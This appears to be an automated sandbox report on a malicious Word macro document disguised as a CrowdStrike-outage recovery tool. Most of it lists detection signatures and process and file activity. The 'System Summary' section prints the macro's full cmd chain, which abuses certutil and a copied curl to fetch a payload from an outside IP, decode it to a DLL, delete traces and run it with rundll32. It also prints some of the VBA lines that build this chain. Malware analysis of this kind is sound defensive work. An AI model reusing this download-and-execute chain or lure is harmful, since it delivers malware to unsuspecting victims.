Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID:	1478411
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags:	docm
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document exploit detected (process start blacklist hit)

Downloads suspicious files via Chrome

Machine Learning detection for dropped file

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Microsoft Office Child Process

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Found potential string decryption / allocating functions

IP address seen in connection with other malware

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash,	7_2_000000013F4D9BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	7_2_000000013F4D9C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4D9C9C CryptHashData,	7_2_000000013F4D9C9C
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash,	22_2_000000013F359BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	22_2_000000013F359C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F359C9C CryptHashData,	22_2_000000013F359C9C

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_90c8dacc-4

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A2738 recv,WSAGetLastError,

7_2_000000013F4A2738

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp

Jump to behavior

Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sb-ssl.google.com

Source: unknown

HTTP traffic detected: POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: sb-ssl.google.comConnection: keep-aliveContent-Length: 1073Content-Type: application/octet-streamSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	String found in binary or memory: http://172.104.160.
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin	String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://aka.ms/WRH
Source: document.xml	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe	String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/P
Source: curl.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)			Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)

Document contains an embedded VBA macro with suspicious strings

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6529.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6690.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer7050.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer601A.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer60A7.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6873.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer6529.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490F28	7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F499B60	7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B1B00	7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F497BAC	7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4BCBDC	7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490658	7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F481AB0	7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AE4F0	7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F48A9B4	7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A49D0	7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AADC8	7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49BDE0	7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49B840	7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F484860	7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49F458	7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4C0804	7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4944A4	7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A88D8	7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490C74	7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B2C88	7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A7888	7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F331B00	22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F319B60	22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310F28	22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F33CBDC	22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F317BAC	22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310658	22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F301AB0	22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32E4F0	22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31BDE0	22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32ADC8	22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3249D0	22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F30A9B4	22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F340804	22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31F458	22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F304860	22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31B840	22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F332C88	22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F327888	22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310C74	22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3288D8	22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3144A4	22_2_000000013F3144A4

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: Sub Document_Open()

Document contains embedded VBA macros

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1F00 appears 134 times

Source: classification engine

Classification label: mal88.expl.evad.winDOCM@51/26@4/3

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

7_2_000000013F483434

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................H.......<...............#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........3)...............................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....	Jump to behavior
